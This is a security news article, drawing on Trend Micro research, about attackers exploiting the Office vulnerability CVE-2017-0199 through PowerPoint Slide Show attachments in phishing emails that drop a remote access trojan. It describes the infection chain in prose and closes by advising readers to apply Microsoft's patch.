Security experts from Trend Micro Lab recently reveals how the criminal hackers are abusing CVE-2017-0199 system security flaws which lets them bypass the detection from anti-virus vendors for invading nasty malware onto the Windows PC by using Microsoft Powerpoint Slide Show files. Talking about the CVE-2017-0199 vulnerability, it was reported by the security researchers as a zero-day remote code execution vulnerability which has been used by the cyber criminals in order to exploit a flaw that exists in the Microsoft Office file identified as Windows Object Linking and Embedding interface in order to attack the Windows computer with noxious threats.
By using the malicious RTF (Rich Text File) documents, the attackers usually exploit the vulnerability. However, the same method were used by the banking Trojan named ‘DRIDEX’ which was reported earlier in this year. Although, the malware researchers at Trend Micro have recently observed a new sample named TROJ_CVE20170199.JVU exploiting the CVE-2017-0199. By using this malware, the hackers are now abusing the Microsoft PowerPoint slide show file to exploit CVE-2017-0199 vulnerability. It is considered as a new approach which has been used by the remote hackers to infect the Windows computer with most hazardous viruses.
Meanwhile, this is not the first time that threat actors are exploiting CVE-2017-0199 to attack the Windows system. According to the security experts, the con artists are now using the new attack method and it can also be abused by other malicious campaigns in near future. One of the most important thing that you should know about this vicious attack is that the hackers delivering the exploit in spam email attachment. When the attached files gets opened by the users, the malware gets executed immediately and finally drops a remote access tool as a payload. In this attack, the crooks are targeting the companies involved in manufacturing electronic products.
More interestingly, the email address used in spreading the phishing emails may look legitimate and appears to be a vital mail from their business partner. However, the user find nothing related to their business in the attached files, but rather a PPSX file. Once the malicious Powerpoint Slide Show file is opened, it immediately displays a text identified as CVE-2017-8570, which is considered as yet another MS Office vulnerability. In reality, instead of displayed text CVE-2017-8570, the exploit actually is CVE-2017-0199 based on the research report published by Trend Micro. This is considered as a leftover mistake by the cyber hackers, which they didn’t wish to change.
After running the sample, the virus experts have found that PowerPoint started initializing the script moniker and then ran the harmful payload of the malware with the help of PowerPoint Show animations feature. Once the flaw has been successfully exploited, it will download a file named ‘logo.doc’ also reported as JS_DLOADER.AUSYVT from the Internet. This file runs a PowerShell command in order to download and execute other malware related file i.e. RATMAN.EXE which is actually a Trojan virus. Since the exploit is used by the cyber offenders in order to deliver compromised .RTF documents and most of the detection methods for CVE-2017-0199 focused on RTF files. Therefore, one of the easiest way to prevent yourself from such vicious attack, you need to download and apply patches released by the Microsoft which was released in April this year that addresses the CVE-2017-0199 vulnerability.